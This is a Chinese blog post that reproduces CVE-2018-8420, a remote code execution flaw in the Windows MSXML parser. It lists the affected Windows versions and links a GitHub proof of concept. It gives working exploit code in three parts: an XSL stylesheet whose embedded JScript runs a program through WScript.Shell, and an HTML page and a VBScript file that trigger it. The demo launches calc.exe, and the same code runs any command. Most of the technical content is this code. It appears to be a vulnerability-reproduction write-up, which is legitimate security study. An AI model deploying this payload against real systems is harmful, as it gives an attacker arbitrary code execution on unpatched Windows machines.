CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)

摘要: Windows新漏洞,通过浏览器执行任意代码。

影响的 Windows 版本:

Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 10 version 1709 for 32-bit Systems
Microsoft Windows 10 version 1709 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for 64-bit Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 1709
Microsoft Windows Server 1803
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016

漏洞复现:

本地测试版本:Microsoft Windows Server 2008 R2 Datacenter

Poc 地址:https://github.com/Sch01ar/CVE-2018-8420

xml,调用计算器

 1 <?xml version=‘1.0‘?> 2 <stylesheet 3 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" 4 xmlns:user="placeholder" 5 version="1.0"> 6 <output method="text"/> 7  <ms:script implements-prefix="user" language="JScript"> 8  <![CDATA[ 9  var r = new ActiveXObject("WScript.Shell").Run("calc.exe");10  ]]> </ms:script>11 </stylesheet>

html

<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>

vbs

Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()

技术分享图片

打开 xml.html

 技术分享图片

技术分享图片

技术分享图片

点击,是

技术分享图片

点击,是

技术分享图片

成功弹出了计算器

直接运行 xml.vbs

技术分享图片

也成功弹出了计算器

CVE-2018-8420 漏洞复现

标签:src   vbscript   tps   windows 8   transform   windows   dom   技术   08 r2   

原文地址:https://www.cnblogs.com/sch01ar/p/10159380.html


上一篇:嵌入式浏览器安全之网易云音乐...
下一篇:CVE-2019-1388 ...

资讯推荐

01

315晚会揭示网安之乱

——来自热月科技

02

诚挚邀请

——来自热月科技

03

中神网盾一周年宣言:将持续发力培养网安实战人才

04

2020年大学生网络安全知识竞赛,百校巡讲开通线上直播课

05

9项免费安全保障,中神网盾助力政企打赢疫情防控阻击战!

——来自安界网

06

后渗透之meterpreter使用攻略

07

wireshark使用方法总结

08

热烈庆贺:中神网盾参与出席“中国网络空间安全协会第一届会员代...

——来自安界网

09

安全合作,实践分享,捍卫信任——中神网盾受邀出席“2019京...

——来自安界网

大家关注

01

RFID破解之小区电动车充电卡

02

技能认证

——来自热月教育学院

03

诚挚邀请

——来自热月科技

04

赛事支撑

——来自热月教育学院

05

学科建设

——来自热月教育学院

06

师资培训

——来自热月教育学院

07

实验室建设

——来自热月教育学院

08

315晚会揭示网安之乱

——来自热月科技

09

实践支持

——来自热月教育学院

10

一篇文章带你了解反序列化漏洞